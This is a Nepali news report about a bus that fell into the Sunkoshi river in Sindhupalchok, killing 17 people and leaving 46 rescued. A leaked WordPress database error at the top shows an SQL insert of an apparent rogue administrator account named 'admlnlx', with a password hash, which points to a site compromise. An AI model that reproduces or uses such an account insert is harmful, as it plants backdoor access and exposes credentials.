WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSx7kOJaEIC5J3yPuFwhgYKLWyLTK./', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 10:53:17', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाण्डौ, सिन्धुपाल्चोकको बलेफी गाउँपालिकाको सुकुटे स्थित सुनकोसी नदीमा बस सख्दा मृत्यु हुनेको संख्या १७ पुगेको छ भने अन्य ४६ जनाको उद्धार गरिएको छ । उद्धार गरिकालाई काभ्रेको धुलिखेल अस्पतालमा ल्याईएको छ ।
घाईते मध्ये ६ जनाको अवस्था गम्भिर रहेको छ भने बसका चालक धनबहादुर तामाङ्ग समेत बोल्न नसक्ने अवस्थामा छन् । उनलाई पनि धुलिखेल अस्पतालमै ल्याईएको सिन्धुपाल्चोकका प्रहरी नायव उपरिक्षक माधव काफ्लेले जानकारी दिनुभयो । उहाँका अनुसार दोलखाको मागा देउरालीबाट काठमाडौं आउँदै गरेको बा २ ख ७२४५ नम्बरको बस आइतबार दिउँसो सुनकोसीमा खसेको थियो । घटनास्थलमा अझै खोजी तथा उद्धार जारी रहेकाले घटनाको विस्तृत विवरण आइनसकेको उनले प्रहरीले बताएको छ ।